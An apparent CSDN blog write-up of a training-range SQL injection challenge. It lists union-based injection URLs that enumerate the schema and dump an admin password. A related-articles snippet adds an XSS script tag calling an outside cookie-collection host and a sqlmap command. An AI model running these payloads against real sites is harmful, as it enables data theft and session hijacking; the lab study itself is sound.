第一章:为了女神小芳!【配套课时:SQL注入攻击原理 实战演练】

最新推荐文章于 2024-10-09 22:03:16 发布
最新推荐文章于 2024-10-09 22:03:16 发布
阅读量408 收藏 11
点赞数 3
分类专栏: 掌控者 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54055099/article/details/140817437
版权

目录

一、原理

二、步骤

1、测试是否存在注入点

2、判断字段数

3、判断回显位置

4、判断数据库和版本

5、判断表名

6、判断字段名

7、获取表的数据

一、原理

SQL数值型注入

二、步骤

点击查看出现id,这里可能存在注入点

1、测试是否存在注入点

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1

回显正常

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2

没有内容回显,说明存在数值型的注入点

2、判断字段数

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 order by 2

oder by 2 时回显正常

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=1 order by 3

没有正常回显,说明当前的表的字段数有两个

3、判断回显位置

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,2

4、判断数据库和版本

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()

数据库名:maoshe

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,version()

当前数据库版本为:5.5.53

5、判断表名

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

表有:admin,dirs,news,xss

6、判断字段名

以admin表为例

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin'

字段有:Id,username,password

7、获取表的数据

http://pu2lh35s.ia.aqlab.cn/?id=1 and 1=2 union select 1,concat_ws(',',Id,username,password) from maoshe.admin 

1,admin,hellohack

题目答案为:hellohack

这篇文章就先写到这里了,哪里不足的欢迎指出

賺钱娶甜甜
关注
专栏目录
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理
红凳子的博客
05-07 2105
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
封神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 816
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
封神台靶场 第一章:为了女神小芳SQL注入
m0_65712192的博客
10-14 1799
封神台靶场 第一章:为了女神小芳SQL注入
封神台靶场(一)为了女神小芳SQL注入攻击】(超级详细)
xiao_mai_的博客
05-11 973
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
封神台——第一题:为了女神小芳
分享简单的安全技术
01-17 714
题目:获取数据库管理员密码 题目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
基础工具运用:爆破管理员账户登录后台【配套课时:burp到支付和暴破 实战演练
04-14 3243
封神台—第三章:爆破管理员账户登录后台【配套课时:burp到支付和暴破 实战演练】 题目: 第二关拿到密码后,虽然在admin路径中成功登录后台,但那竟然是一个假后台! 不过没关系,尤里也遇到过不少假后台,他决定换个思路入手,通过信息收集…… 它找到了女神的另一个购物网站,尤里决定从这个网站入手…… 一、登录爆破 1、http://59.63.200.79:8003/dami_999/dami_666/index.php首页右上角有个登录按钮,厉害了,点击登录 2、居然这么简单,直接..
尤里的复仇Ⅰ 小芳
HNU凌风的博客
03-10 786
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门(小芳公司网站). 第一步,判断是否存在sql注入漏洞 在网站后构造?id=1 and 1=1 ,然后回车 页面返回正常 再次构造 ?id=1 and 1=2 然后回车 这里页面返回异常,初步判断这里可能存在一个sql注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 or
第一章:什么是SQL注入
weixin_34184158的博客
08-17 171
一、 SQL概述 1.SQLSQL Injection)注入是这样一种漏洞,应用程序在像后台数据传递SQL查询时,如果为***者提供了影响该查询的能力,就会引发SQL注入。二、 理解Web应用的***原理 1.数据驱动的Web应用通常包含三层:表示层(Web浏览器或呈现引擎),逻辑层(如:C#、Java、PHP等编程语言),和存储层(Mysql、Oracle等...
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1136
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
封神台靶场-第一章
Mr_helloword的博客
07-12 2793
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 寻找注入点,判断是什么注入 |?id=1 and 1=1| 显示正常 | |-|–| | ?id=1and 1=2| 页面有变故(存在注入) | |?id=1’ | 页面有回显但是无法判断注入类型| ||| 查看列数及字段数(这里通过二分法可以快速定位列数为2) 联合查询(注意前面id为假才会执行后门的联合查询) |?id=121 union select 1,2 #| 查看回显位置 | |–|--| |?id=1
封神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3035
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
封神台靶场 第一章:为了女神小芳!writeup
Sk1y的博客
02-15 2万+
封神台靶场 第一章:为了女神小芳! 题目简述: 封神台靶场,题目链接 解题过程: 首先是这样的url为: http://59.63.200.79:8003/ 当点击点击查看新闻时,相应的url变化,变为如下: http://59.63.200.79:8003/?id=1 ...
封神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1604
我们先来学习sql注入
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列关系
学习之余随便记记
10-05 857
本文重点讨论在具有 * 列的嵌套子查询中建立表和列之间正确关系的挑战。使用 Teradata SQL 代码示例来说明该过程。本文聚焦于一个别名为 SUBSCRIBER_ 的子查询及其派生的列,这些列在外层查询中被使用。有些列在子查询的选择列表中被明确列出,而其他一些列则来自一个列(SUBSCR.),这个*列引用了 PRD2_ODW.SUBSCRIBER_ 表。接着,分析检查了外层查询的选择列表,特别是来自 SUBSCRIBER_ 子查询的列。
PostgreSQL常用数值处理函数简介
lunan的博客
10-04 612
这些数值处理函数提供了丰富的数值计算功能,从简单的数学操作到更高级的科学计算,满足了大多数数据库操作中的数值处理需求。
SQL】深入探索SQL调优:提升数据库性能的全面指南
最新发布
人生苦短,睡觉要紧,睡醒再说
10-09 976
在本文中,我们深入探讨了SQL调优的重要性及其在提升数据库性能中的关键角色。从理解执行计划到选择合适的索引,每一个细节都能显著影响应用程序的响应速度和处理能力。我们强调了基本的优化原则,如避免使用SELECT *、合理使用JOIN,以及定期更新统计信息。同时,数据库配置和硬件优化也不可忽视,它们直接关系到系统的整体性能。通过采用这些策略和技术,开发者和数据库管理员能够有效提高数据库的效率,确保系统在高负载下依然稳定运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值